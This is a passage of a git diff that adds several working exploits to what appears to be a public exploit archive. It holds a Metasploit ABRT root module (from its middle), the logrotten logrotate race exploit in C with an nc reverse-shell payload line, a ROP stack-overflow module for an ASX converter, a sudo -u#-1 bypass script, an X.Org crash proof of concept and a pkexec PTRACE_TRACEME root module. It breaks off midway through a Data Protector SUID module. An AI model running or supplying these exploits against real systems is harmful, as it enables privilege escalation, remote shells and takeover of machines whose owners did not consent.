+      vprint_error 'System is not configured to use ABRT for crash reporting'
+      return CheckCode::Safe
+    end
+    vprint_good 'System is configured to use ABRT for crash reporting'
+
+    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
+      vprint_error 'abrt-ccp service not running'
+      return CheckCode::Safe
+    end
+    vprint_good 'abrt-ccpp service is running'
+
+    # Patched in 2.1.11-35.el7
+    pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s
+    abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\s+/)[1]
+    if abrt_version.blank?
+      vprint_status 'Could not retrieve ABRT package version'
+      return CheckCode::Safe
+    end
+    unless Gem::Version.new(abrt_version) < Gem::Version.new('2.1.11-35.el7')
+      vprint_status "ABRT package version #{abrt_version} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "ABRT package version #{abrt_version} is vulnerable"
+
+    unless command_exists? 'python'
+      vprint_error 'python is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'python is installed'
+
+    CheckCode::Appears
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    chmod path
+    register_file_for_cleanup path
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    exe_data = ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2015-5287', 'sosreport-rhel7.py')
+    exe_name = ".#{rand_text_alphanumeric 5..10}"
+    exe_path = "#{base_dir}/#{exe_name}"
+    upload_and_chmodx exe_path, exe_data
+
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    register_file_for_cleanup '/tmp/hax.sh'
+
+    print_status "Launching exploit - This might take a few minutes (Timeout: #{timeout}s) ..."
+    output = cmd_exec "echo \"#{payload_path}& exit\" | #{exe_path}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47466.c b/exploits/linux/local/47466.c
new file mode 100644
index 000000000..6f223de0f
--- /dev/null
+++ b/exploits/linux/local/47466.c
@@ -0,0 +1,354 @@
+# Exploit Title: logrotten 3.15.1 - Privilege Escalation
+# Date: 2019-10-04
+# Exploit Author: Wolfgang Hotwagner
+# Vendor Homepage: https://github.com/logrotate/logrotate
+# Software Link: https://github.com/logrotate/logrotate/releases/tag/3.15.1
+# Version: all versions through 3.15.1
+# Tested on: Debian GNU/Linux 9.5 (stretch)
+
+## Brief description
+  - logrotate is prone to a race condition after renaming the logfile.
+  - If logrotate is executed as root, with option that creates a
+    file ( like create, copy, compress, etc.) and the user is in control
+    of the logfile path, it is possible to abuse a race-condition to write
+    files in ANY directories.
+  - An attacker could elevate his privileges by writing reverse-shells into
+    directories like "/etc/bash_completition.d/".
+
+## Precondition for privilege escalation
+  - Logrotate has to be executed as root
+  - The logpath needs to be in control of the attacker
+  - Any option that creates files is set in the logrotate configuration
+
+## Tested version
+  - Debian GNU/Linux 9.5 (stretch)
+  - Amazon Linux 2 AMI (HVM)
+  - Ubuntu 18.04.1
+  - logrotate 3.8.6
+  - logrotate 3.11.0
+  - logrotate 3.15.0
+
+## Compile
+  - gcc -o logrotten logrotten.c
+
+## Prepare payload
+```
+echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &);
+fi" > payloadfile
+```
+
+## Run exploit
+
+If "create"-option is set in logrotate.cfg:
+```
+ ./logrotten -p ./payloadfile /tmp/log/pwnme.log
+```
+
+If "compress"-option is set in logrotate.cfg:
+```
+./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
+```
+
+## Known Problems
+  - It's hard to win the race inside a docker container or on a lvm2-volume
+
+## Mitigation
+  - make sure that logpath is owned by root
+  - use option "su" in logrotate.cfg
+  - use selinux or apparmor
+
+## Author
+  - Wolfgang Hotwagner
+
+## References
+
+  - https://github.com/whotwagner/logrotten
+  -
+https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
+  -
+https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
+  - https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
+  -
+https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd
+
+
+logrotten.c
+
+/*
+ * logrotate poc exploit
+ *
+ * [ Brief description ]
+ *   - logrotate is prone to a race condition after renaming the logfile.
+ *   - If logrotate is executed as root and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories.
+ *   - An attacker could elevate his privileges by writing reverse-shells into 
+ *     directories like "/etc/bash_completition.d/".
+ *
+ * [ Precondition for privilege escalation ]
+ *   - Logrotate needs to be executed as root
+ *   - The logpath needs to be in control of the attacker
+ *   - Any option(create,compress,copy,etc..) that creates a new file is set in the logrotate configuration. 
+ * 
+ * [ Tested version ]
+ *   - Debian GNU/Linux 9.5 (stretch)
+ *   - Amazon Linux 2 AMI (HVM)
+ *   - Ubuntu 18.04.1
+ *   - logrotate 3.8.6
+ *   - logrotate 3.11.0
+ *   - logrotate 3.15.0
+ *
+ * [ Compile ]
+ *   - gcc -o logrotten logrotten.c
+ *
+ * [ Prepare payload ]
+ *   - echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile
+ *
+ * [ Run exploit ]
+ *   - nice -n -20 ./logrotten -p payloadfile /tmp/log/pwnme.log
+ *   - if compress is used: nice -n -20 ./logrotten -c -s 3 -p payloadfile /tmp/log/pwnme.log.1
+ *
+ * [ Known Problems ]
+ *   - It's hard to win the race inside a docker container or on a lvm2-volume
+ *
+ * [ Mitigation ]
+ *   - make sure that logpath is owned by root
+ *   - use su-option in logrotate.cfg
+ *   - use selinux or apparmor
+ *
+ * [ Author ]
+ *   - Wolfgang Hotwagner
+ *
+ * [ Contact ]
+ *   - https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
+ *   - https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
+ *   - https://github.com/whotwagner/logrotten
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/inotify.h>
+#include <unistd.h>
+#include <string.h>
+#include <alloca.h>
+#include <sys/stat.h>
+#include <getopt.h>
+
+
+#define EVENT_SIZE  ( sizeof (struct inotify_event) )
+#define EVENT_BUF_LEN     ( 1024 * ( EVENT_SIZE + 16 ) )
+
+/* use TARGETDIR without "/" at the end */
+#define TARGETDIR "/etc/bash_completion.d"
+
+#define PROGNAME "logrotten"
+
+void usage(const char* progname)
+{
+	printf("usage: %s [OPTION...] <logfile>\n",progname);
+	printf("  %-3s %-22s %-30s\n","-h","--help","Print this help");
+	printf("  %-3s %-22s %-30s\n","-t","--targetdir <dir>","Abosulte path to the target directory");
+	printf("  %-3s %-22s %-30s\n","-p","--payloadfile <file>","File that contains the payload");
+	printf("  %-3s %-22s %-30s\n","-s","--sleep <sec>","Wait before writing the payload");
+	printf("  %-3s %-22s %-30s\n","-d","--debug","Print verbose debug messages");
+	printf("  %-3s %-22s %-30s\n","-c","--compress","Hijack compressed files instead of created logfiles");
+	printf("  %-3s %-22s %-30s\n","-o","--open","Use IN_OPEN instead of IN_MOVED_FROM");
+}
+
+int main(int argc, char* argv[] )
+{
+  int length, i = 0;
+  int j = 0;
+  int index = 0;
+  int fd;
+  int wd;
+  char buffer[EVENT_BUF_LEN];
+  uint32_t imask = IN_MOVED_FROM;
+  char *payloadfile = NULL;
+  char *logfile = NULL;
+  char *targetdir = NULL;
+  char *logpath;
+  char *logpath2;
+  char *targetpath;
+  int debug = 0;
+  int sleeptime = 1;
+  char ch;
+  const char *p;
+  FILE *source, *target;    
+
+  int c;
+
+  while(1)
+  {
+	int this_option_optind = optind ? optind : 1;
+	int option_index = 0;
+	static struct option long_options[] = {
+		{"payloadfile", required_argument, 0, 0},
+		{"targetdir", required_argument, 0, 0},
+		{"sleep", required_argument, 0, 0},
+		{"help", no_argument, 0, 0},
+		{"open", no_argument, 0, 0},
+		{"debug", no_argument, 0, 0},
+		{"compress", no_argument, 0, 0},
+		{0,0,0,0}
+	};
+
+	c = getopt_long(argc,argv,"hocdp:t:s:", long_options, &option_index);
+	if (c == -1)
+		break;
+
+	switch(c)
+	{
+		case 'p':
+			payloadfile = alloca((strlen(optarg)+1)*sizeof(char));
+	  		memset(payloadfile,'\0',strlen(optarg)+1);
+			strncpy(payloadfile,optarg,strlen(optarg));
+			break;
+		case 't':
+			targetdir = alloca((strlen(optarg)+1)*sizeof(char));
+	  		memset(targetdir,'\0',strlen(optarg)+1);
+			strncpy(targetdir,optarg,strlen(optarg));
+			break;
+		case 'h':
+			usage(PROGNAME);
+			exit(EXIT_FAILURE);
+			break;
+		case 'd':
+			debug = 1;
+			break;
+		case 'o':
+			imask = IN_OPEN;
+			break;
+		case 'c':
+			imask = IN_OPEN;
+			break;
+		case 's':
+			sleeptime = atoi(optarg);
+			break;
+		default:
+			usage(PROGNAME);
+			exit(EXIT_FAILURE);
+			break;
+	}
+  }
+
+  if(argc == (optind+1))
+  {
+	  logfile = alloca((strlen(argv[optind])+1)*sizeof(char));
+	  memset(logfile,'\0',strlen(argv[optind])+1);
+	  strncpy(logfile,argv[optind],strlen(argv[optind]));
+  }
+  else
+  {
+	  usage(PROGNAME);
+	  exit(EXIT_FAILURE);
+  }
+
+  for(j=strlen(logfile); (logfile[j] != '/') && (j != 0); j--);
+
+  index = j+1;
+
+  p = &logfile[index];
+
+  logpath = alloca(strlen(logfile)*sizeof(char));
+  logpath2 = alloca((strlen(logfile)+2)*sizeof(char));
+
+  if(targetdir != NULL)
+  {
+  	targetpath = alloca( ( (strlen(targetdir)) + (strlen(p)) +3) *sizeof(char));
+  	strcat(targetpath,targetdir);
+  }
+  else
+  {
+	targetdir= TARGETDIR;
+  	targetpath = alloca( ( (strlen(TARGETDIR)) + (strlen(p)) +3) *sizeof(char));
+        targetpath[0] = '\0';
+  	strcat(targetpath,TARGETDIR);
+  }
+  strcat(targetpath,"/");
+  strcat(targetpath,p);
+
+  for(j = 0; j < index; j++)
+	  logpath[j] = logfile[j];
+  logpath[j-1] = '\0';
+
+  strcpy(logpath2,logpath);
+  logpath2[strlen(logpath)] = '2';
+  logpath2[strlen(logpath)+1] = '\0';
+
+  /*creating the INOTIFY instance*/
+  fd = inotify_init();
+
+  if( debug == 1)
+  {
+  	printf("logfile: %s\n",logfile);
+  	printf("logpath: %s\n",logpath);
+  	printf("logpath2: %s\n",logpath2);
+  	printf("targetpath: %s\n",targetpath);
+  	printf("targetdir: %s\n",targetdir);
+  	printf("p: %s\n",p);
+  }
+
+  /*checking for error*/
+  if ( fd < 0 ) {
+    perror( "inotify_init" );
+  }
+
+  wd = inotify_add_watch( fd,logpath, imask );
+
+  printf("Waiting for rotating %s...\n",logfile);
+
+while(1)
+{
+  i=0;
+  length = read( fd, buffer, EVENT_BUF_LEN ); 
+
+  while (i < length) {     
+      struct inotify_event *event = ( struct inotify_event * ) &buffer[ i ];     if ( event->len ) {
+      if ( event->mask & imask ) { 
+	  if(strcmp(event->name,p) == 0)
+	  {
+            rename(logpath,logpath2);
+            symlink(targetdir,logpath);
+	    printf("Renamed %s with %s and created symlink to %s\n",logpath,logpath2,targetdir);
+	    if(payloadfile != NULL)
+	    {
+		 printf("Waiting %d seconds before writing payload...\n",sleeptime);
+	   	 sleep(sleeptime);
+	   	 source = fopen(payloadfile, "r");	    
+	   	 if(source == NULL)
+	   	         exit(EXIT_FAILURE);
+
+	   	 target = fopen(targetpath, "w");	    
+	   	 if(target == NULL)
+	   	 {
+	   	         fclose(source);
+	   	         exit(EXIT_FAILURE);
+	   	 }
+
+	   	 while ((ch = fgetc(source)) != EOF)
+	   	         fputc(ch, target);
+
+	   	 chmod(targetpath,S_IRUSR | S_IXUSR | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH);
+	   	 fclose(source);
+	   	 fclose(target);
+	    }
+   	    inotify_rm_watch( fd, wd );
+   	    close( fd );
+	    printf("Done!\n");
+
+	    exit(EXIT_SUCCESS);
+	  }
+      }
+    }
+    i += EVENT_SIZE + event->len;
+  }
+}
+  /*removing from the watch list.*/
+   inotify_rm_watch( fd, wd );
+
+  /*closing the INOTIFY instance*/
+   close( fd );
+
+   exit(EXIT_SUCCESS);
+}
\ No newline at end of file
diff --git a/exploits/linux/local/47482.rb b/exploits/linux/local/47482.rb
new file mode 100755
index 000000000..fcede6ba6
--- /dev/null
+++ b/exploits/linux/local/47482.rb
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
+       By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the
+       application, a buffer is overwritten, which allows for running shellcode.
+	   Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
+	              Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Maxim Guslyaev', # EDB POC, Metasploit Module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-15221' ],
+          [ 'EDB', '47468' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [
+            'Windows 7 Enterprise/10 Pro',
+            {
+              'Ret' => 0x1002D038 # RET
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x09\x0a"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Oct 06 2019",
+      'DefaultTarget'  => 0))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
+    ])
+  end
+
+  def exploit
+  
+	buf = "http://"
+	buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"
+
+	## Save allocation type (0x1000) in EDX
+	buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
+	buf += [0x11111111].pack("V")
+	buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN
+	buf += [0x1002D493].pack("V") # POP EDX # RETN
+	buf += [0xEEEEFEEF].pack("V")
+	buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
+	buf += [0x41414141].pack("V")
+
+	## Save the address of VirtualAlloc() in ESI
+	buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] 
+	buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
+	buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
+	buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
+	buf += [0x41414141].pack("V")
+	buf += [0x41414141].pack("V")
+
+	## Save the size of the block in EBX
+	buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
+	buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN
+
+	## Save the address of (# ADD ESP,8 # RETN) in EBP
+	buf += [0x10031c6c].pack("V") # POP EBP # RETN
+	buf += [0x10012316].pack("V") # ADD ESP,8 # RETN
+	#buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
+
+	## Save memory protection code (0x40) in ECX
+	buf += [0x1002ca22].pack("V") # POP ECX # RETN
+	buf += [0xFFFFFFFF].pack("V")
+	buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
+	buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
+	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
+	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
+	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
+	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
+	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
+	buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
+
+	## Save ROP-NOP in EDI
+	buf += [0x1002e346].pack("V") # POP EDI # RETN
+	buf += [0x1002D038].pack("V") # RETN
+
+	## Save NOPs in EAX
+	#buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] 
+	#buf += [0x90909090].pack("V") # nop
+
+	## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
+	buf += [0x1002E516].pack("V") # POP EAX # RETN
+	buf += [0xA4E2F275].pack("V")
+	buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN
+	buf += [0x10040ce5].pack("V") # PUSH EAX # RETN
+
+	buf += "\x90" * 4
+	buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
+	buf += "\x90" * 20
+	buf += payload.encoded
+
+    file_create(buf)
+	
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47502.py b/exploits/linux/local/47502.py
new file mode 100755
index 000000000..a1b00f8c5
--- /dev/null
+++ b/exploits/linux/local/47502.py
@@ -0,0 +1,80 @@
+# Exploit Title : sudo 1.8.27 - Security Bypass
+# Date : 2019-10-15
+# Original Author: Joe Vennix
+# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
+# Version : Sudo <1.2.28
+# Tested on Linux
+# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
+# Fix : The bug is fixed in sudo 1.8.28
+# CVE : 2019-14287
+
+'''Check for the user sudo permissions
+
+sudo -l 
+
+User hacker may run the following commands on kali:
+    (ALL, !root) /bin/bash
+
+
+So user hacker can't run /bin/bash as root (!root)
+
+
+User hacker sudo privilege in /etc/sudoers
+
+# User privilege specification
+root    ALL=(ALL:ALL) ALL
+
+hacker ALL=(ALL,!root) /bin/bash
+
+
+With ALL specified, user hacker can run the binary /bin/bash as any user
+
+EXPLOIT: 
+
+sudo -u#-1 /bin/bash
+
+Example : 
+
+hacker@kali:~$ sudo -u#-1 /bin/bash
+root@kali:/home/hacker# id
+uid=0(root) gid=1000(hacker) groups=1000(hacker)
+root@kali:/home/hacker#
+
+Description :
+Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
+-u#-1 returns as 0 which is root's id
+
+and /bin/bash is executed with root permission
+Proof of Concept Code :
+
+How to use :
+python3 sudo_exploit.py
+
+'''
+
+
+#!/usr/bin/python3
+
+import os
+
+#Get current username
+
+username = input("Enter current username :")
+
+
+#check which binary the user can run with sudo
+
+os.system("sudo -l > priv")
+
+
+os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
+
+binary_file = open("binary")
+
+binary= binary_file.read()
+
+#execute sudo exploit
+
+print("Lets hope it works")
+
+os.system("sudo -u#-1 "+ binary)
\ No newline at end of file
diff --git a/exploits/linux/local/47507.py b/exploits/linux/local/47507.py
new file mode 100755
index 000000000..2afdddec8
--- /dev/null
+++ b/exploits/linux/local/47507.py
@@ -0,0 +1,43 @@
+# Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow
+# Date: 2019-10-16
+# Exploit Author: Marcelo Vázquez (aka s4vitar)
+# Vendor Homepage: https://www.x.org/
+# Version: <= 1.20.4
+# Tested on: Linux
+# CVE: CVE-2019-17624
+
+#!/usr/bin/python
+#coding: utf-8
+
+# ************************************************************************
+# *                Author: Marcelo Vázquez (aka s4vitar)                 *
+# *      X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow)  *
+# ************************************************************************
+
+import sys, time
+import ctypes as ct
+
+from ctypes import cast
+from ctypes.util import find_library
+
+def access_violation(x11, current_display):
+	keyboard = (ct.c_char * 1000)()
+	x11.XQueryKeymap(current_display, keyboard)
+
+if __name__ == '__main__':
+
+	print "\n[*] Loading x11...\n"
+	time.sleep(2)
+
+	x11 = ct.cdll.LoadLibrary(find_library("X11"))
+	current_display = x11.XOpenDisplay(None)
+
+	print "[*] Exploiting...\n"
+	time.sleep(1)
+
+	try:
+		access_violation(x11, current_display)
+
+	except:
+		print "\nError...\n"
+		sys.exit(1)
\ No newline at end of file
diff --git a/exploits/linux/local/47543.rb b/exploits/linux/local/47543.rb
new file mode 100755
index 000000000..c3885778f
--- /dev/null
+++ b/exploits/linux/local/47543.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Compile
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
+      'Description'   => %q{
+          This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
+          kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
+          not over an SSH session, as it requires execution from within the context of
+          a user with an active Polkit agent.
+          In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
+          the recording of the credentials of a process that wants to create a ptrace
+          relationship, which allows local users to obtain root access by leveraging
+          certain scenarios with a parent-child process relationship, where a parent drops
+          privileges and calls execve (potentially allowing control by an attacker). One
+          contributing factor is an object lifetime issue (which can also cause a panic).
+          Another contributing factor is incorrect marking of a ptrace relationship as
+          privileged, which is exploitable through (for example) Polkit's pkexec helper
+          with PTRACE_TRACEME.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'Jann Horn',    # Discovery and exploit
+          'bcoles',       # Metasploit module
+          'timwr',        # Metasploit module
+      ],
+      'References'     => [
+          ['CVE', '2019-13272'],
+          ['EDB', '47133'],
+          ['PACKETSTORM', '153663'],
+          ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
+          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
+      ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X64 ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'DefaultOptions' =>
+        {
+          'Payload'     => 'linux/x64/meterpreter/reverse_tcp',
+          'PrependFork' => true,
+        },
+      'DisclosureDate' => 'Jul 4 2019'))
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def check
+    # Introduced in 4.10, but also backported
+    # Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17
+    release = kernel_release
+    v = Gem::Version.new release.split('-').first
+
+    if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')
+      vprint_error "Kernel version #{release} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "Kernel version #{release} appears to be vulnerable"
+
+    unless command_exists? 'pkexec'
+      vprint_error 'pkexec is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'pkexec is installed'
+
+    arch = kernel_hardware
+    unless arch.include? 'x86_64'
+      vprint_error "System architecture #{arch} is not supported"
+      return CheckCode::Safe
+    end
+    vprint_good "System architecture #{arch} is supported"
+
+    loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
+    if loginctl_output =~ /Remote=yes/
+      print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+    end
+
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
+    upload_and_chmodx(payload_file, generate_payload_exe)
+    register_file_for_cleanup(payload_file)
+
+    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c')
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit')
+    end
+    register_file_for_cleanup(exploit_file)
+
+    print_status("Executing exploit '#{exploit_file}'")
+    result = cmd_exec("echo #{payload_file} | #{exploit_file}")
+    print_status("Exploit result:\n#{result}")
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47580.rb b/exploits/linux/local/47580.rb
new file mode 100755
index 000000000..f1f5fd189
--- /dev/null
+++ b/exploits/linux/local/47580.rb
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
+      'Description'    => %q{
+        This module exploits the trusted `$PATH` environment
+        variable of the SUID binary `omniresolve` in
+        Micro Focus (HPE) Data Protector A.10.40 and prior.
+
+        The `omniresolve` executable calls the `oracleasm` binary using
+        a relative path and the trusted environment `$PATH`, which allows
+        an attacker to execute a custom binary with `root` privileges.
+
+        This module has been successfully tested on:
+        HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
+        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
+
+        The vulnerability has been patched in:
+        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          's7u55', # Discovery and Metasploit module
+        ],
+      'DisclosureDate' => '2019-09-13',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        =>
+        [
+          [
+            'Micro Focus (HPE) Data Protector <= 10.40 build 118',
+            upper_version: Gem::Version.new('10.40')
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PrependSetgid' => true,
+          'PrependSetuid' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2019-11660' ],
+          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
+        ]
+    ))
+
+    register_options(
+      [
+        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def suid_bin_path
+    datastore['SUID_PATH'].to_s
+  end
+
+  def check
+    unless setuid? suid_bin_path
+      vprint_error("#{suid_bin_path} executable is not setuid")
+      return CheckCode::Safe
+    end
+
+    info = cmd_exec("#{suid_bin_path} -ver").to_s
+    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
+      version = '%.2f' % $1.to_f
+      build = $3.to_i
+      vprint_status("omniresolve version #{version} build #{build}")
+
+      unless Gem::Version.new(version) < target[:upper_version] ||
+             (Gem::Version.new(version) == target[:upper_version] && build <= 118)
